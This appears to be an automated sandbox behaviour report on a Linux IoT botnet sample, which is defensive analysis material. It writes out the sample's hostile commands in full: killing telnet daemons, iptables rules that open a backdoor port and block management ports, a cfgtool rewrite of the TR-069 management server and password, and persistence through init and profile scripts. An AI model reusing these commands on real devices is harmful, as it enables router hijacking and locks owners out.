Source: nT7K5GG5km, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4638)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/nT7K5GG5km (PID: 4600)

File: /proc/4600/mounts

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/cedilla-portuguese.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/apps-bin-path.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/Z97-byobu.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/bash_completion.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/vte-2.91.sh	Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/rcS.d/S95baby.sh			Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/rc.local			Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 4604)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4294/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/230/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/231/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/232/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/233/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/234/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3512/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/359/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1452/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3632/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4600/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4602/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3518/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/10/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1339/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4605/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/11/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/12/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/13/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/14/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/15/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/16/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/17/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/18/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/19/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/483/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3527/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3527/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/2/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3525/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1346/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3524/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3524/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3523/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/5/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/7/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/8/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/9/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/20/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/21/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/22/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/23/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/24/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/25/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/28/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/29/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1363/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3541/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3541/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1362/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/496/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/496/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/30/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/31/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/31/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1119/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3790/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3791/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3310/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3431/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3431/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3550/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/260/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/263/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/264/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/385/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/144/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/386/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/145/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/146/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3546/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3546/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/147/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3303/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3545/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/148/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/149/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3543/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/822/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/822/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3308/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3308/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3429/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3429/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/47/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/48/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/48/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/49/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/150/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/271/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/151/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/152/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/153/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/395/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/396/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/154/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/155/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/156/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1017/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/157/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/158/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/159/stat	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/nT7K5GG5km (PID: 4602)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4636)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4670)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4674)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4715)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4724)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4750)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4759)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4775)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4813)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4816)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4828)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4855)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4882)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4891)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4893)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4904)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4931)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4955)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4979)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4988)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5005)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5031)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5057)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5065)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5085)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5111)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5137)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5149)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5160)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5182)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5210)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5219)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5248)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5257)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"	Jump to behavior

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4638)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

Reads system information from the proc file system

Source: /tmp/nT7K5GG5km (PID: 4627)

Reads from proc file: /proc/stat

Jump to behavior

Sample tries to set the executable flag

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Writes ELF files to disk

Source: /tmp/nT7K5GG5km (PID: 4600)

File written: /usr/networks

Jump to dropped file

Writes shell script files to disk

Source: /tmp/nT7K5GG5km (PID: 4600)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Source: submitted sample

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/S95baby.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountall.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/checkfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/umountnfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountkernfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/checkroot-bootclean.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountnfs-bootclean.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/bootmisc.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/checkroot.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/hostname.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountdevsubfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountall-bootclean.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountnfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /usr/bin/gettext.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /usr/sbin/alsa-info.sh	Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
